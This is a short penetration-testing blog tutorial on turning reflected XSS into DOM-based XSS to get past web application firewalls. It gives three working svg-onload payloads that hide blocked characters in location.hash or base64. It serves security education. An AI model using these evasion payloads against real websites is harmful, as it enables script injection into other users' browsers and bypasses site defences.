Cross-site scripting, Penetration Testing, Technology, Tutorials

Using DOM Based XSS To Bypass WAF

February 5, 2017

What is DOM Based XSS?

DOM Based XSS is a Cross-site scripting attack whereby it is dependent on the improper handling within the HTML page corresponding the data from its correlated DOM. The client side Javascript is unable to sanitize the input prior to writing it into the DOM. Thus, the payload is achieved by altering the DOM realm situated in the target’s browser applied by the initial client side script. This poses an issue for the Web Application Firewall (WAF) since DOM Based XSS transpires on the client side. Consequently, DOM Based XSS emerges as most of the most arduous and hazardous types of XSS attacks to unearth. A server side filter like a WAF will not succeed at obstructing these sorts of DOM Based XSS attacks.

For purposes of this article, I will provide two attack vectors which can be utilized to alter a reflected XSS into a DOM based XSS vulnerability and examine them closely.

Vector 1

<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.has
h[2]+/docu/.source+/ment.domain/.source+location.hash[3]#:()

This payload applies string concatenation as well as location.hash which can infuse prohibited characters. Utilizing this is possible where the characters [, .,],+ are permitted and other regularly blocked characters like (, ),: are strictly prohibited. We introduced location.hash[index] so we could insert the forbidden characters which made it possible for these forbidden characters to be transferred subsequently the hash which is never transmitted to the server.

Vector 2

<svg/onload=eval(location.hash.slice(1))>?#alert(1)

This payload indicates that the slice(1) function will recur back to the location.hash string which ultimately bounces back to the character residing in position 1. This is then evaluated by the eval() function which leads to Javascript being accomplished. We must carefully emphasize that if an eval keyword in the vector is being restricted, we can use alternative executive points like SetTimeout. Also, note that Firefox does encode after the location.hash, thus it can be suggested utilizing functions like atob so we can make sure that the payload works properly.

NOTE: The execution point is where the user input wanders into.

Therefore:

<svg/onload=eval(atob(location.hash.slice(1)))>#YWxlcnQoMSkvLw==

We can locate DOM based XSS using relatively simple techniques such as test scripts located here.

You Might Also Like

Back to top
%d bloggers like this: